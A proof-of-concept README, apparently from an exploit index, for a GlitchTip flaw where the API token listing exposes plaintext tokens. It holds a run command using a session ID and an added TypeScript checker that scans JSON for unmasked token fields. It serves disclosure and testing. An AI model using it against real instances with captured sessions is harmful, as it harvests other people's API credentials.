## https://sploitus.com/exploit?id=BCA6139D-6929-587C-AC5B-6B290E2570E6
# GlitchTip plaintext API token exposure PoC
This PoC requests the API token listing of a local GlitchTip instance using an existing user session and checks whether the JSON response includes a non-empty plaintext `token` field (the secret itself, rather than a masked or omitted value).
## Install
```sh
npm install
```
## Steps to reproduce
```sh
npx ts-node .\glitchtip-plaintext-api-tokens-poc.ts --url http://localhost:8000 --path /api/0/api-tokens/ --session-id SESSION_ID
```
Optional CSRF token:
```sh
npx ts-node .\glitchtip-plaintext-api-tokens-poc.ts --url http://localhost:8000 --path /api/0/api-tokens/ --session-id SESSION_ID --csrf-token CSRF_TOKEN
```
1. Use the session ID of a logged-in user on a local test instance you control.
2. Run the endpoint check command above, adding `--csrf-token` if the instance rejects the request without one.
3. Inspect the PoC output for any `token` fields it reports.
## Expected vulnerable behavior
If the response contains a non-empty plaintext `token` field, the script reports potential exposure.
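The check the PoC performs, as an added example that is not the repository's own script: it builds the authenticated GET request, then walks a parsed API token listing and reports every `token` field that holds a non-redacted string. The sample response is constructed for this example; the cookie name `sessionid` and the `X-CSRFToken` header are the Django defaults and are assumptions about GlitchTip. It goes slightly beyond the page's "non-empty" rule by treating an all-asterisk value as masked, which is also an assumption.

```typescript
// Added example, not the PoC script from this repository.
// Cookie/header names below are Django defaults, assumed for GlitchTip.

interface Finding {
  path: string;  // JSON path of the exposed field, e.g. $.results[0].token
  value: string; // the plaintext value found
}

// Redaction heuristic (assumption, not from the PoC): an empty `token` or one
// made only of mask characters is treated as redacted rather than exposed.
function looksRedacted(value: string): boolean {
  return value.length === 0 || /^[*•xX]+$/.test(value);
}

// Recursively walk a parsed JSON body and collect every `token` field holding
// a non-redacted string. Works for a bare array and for a paginated object
// such as { results: [...] }.
function findPlaintextTokens(node: unknown, path = "$"): Finding[] {
  const findings: Finding[] = [];
  if (Array.isArray(node)) {
    node.forEach((item, i) => {
      findings.push(...findPlaintextTokens(item, `${path}[${i}]`));
    });
  } else if (node !== null && typeof node === "object") {
    for (const [key, value] of Object.entries(node as Record<string, unknown>)) {
      const childPath = `${path}.${key}`;
      if (key === "token" && typeof value === "string") {
        if (!looksRedacted(value)) findings.push({ path: childPath, value });
      } else {
        findings.push(...findPlaintextTokens(value, childPath));
      }
    }
  }
  return findings;
}

// Build the request the PoC sends: session cookie always, CSRF cookie and
// header only when a token is supplied (names are assumptions, see above).
function buildRequest(baseUrl: string, path: string, sessionId: string, csrfToken?: string) {
  const headers: Record<string, string> = {
    Accept: "application/json",
    Cookie: `sessionid=${sessionId}`,
  };
  if (csrfToken) {
    headers.Cookie += `; csrftoken=${csrfToken}`;
    headers["X-CSRFToken"] = csrfToken;
  }
  return { method: "GET", url: baseUrl.replace(/\/+$/, "") + path, headers };
}

// Constructed sample listing: one exposed value, one masked value, and one
// entry with no token field at all.
const SAMPLE_RESPONSE = JSON.stringify({
  results: [
    { id: 1, label: "ci-bot", token: "d3adbeef0123456789abcdef" },
    { id: 2, label: "masked", token: "********" },
    { id: 3, label: "no-field", scopes: ["project:read"] },
  ],
});

// Parse a raw response body and decide whether it indicates exposure.
function checkResponse(raw: string): { vulnerable: boolean; findings: Finding[] } {
  const findings = findPlaintextTokens(JSON.parse(raw));
  return { vulnerable: findings.length > 0, findings };
}

const request = buildRequest("http://localhost:8000", "/api/0/api-tokens/", "SESSION_ID", "CSRF_TOKEN");
console.log("would send", request.method, request.url, request.headers);

const report = checkResponse(SAMPLE_RESPONSE);
console.log(report.vulnerable ? "potential exposure" : "no plaintext token fields", report.findings);
```

Against a live instance, replace `SAMPLE_RESPONSE` with the body returned for the built request; only the `$.results[0].token` entry above should be reported, since the masked entry is filtered by the redaction heuristic.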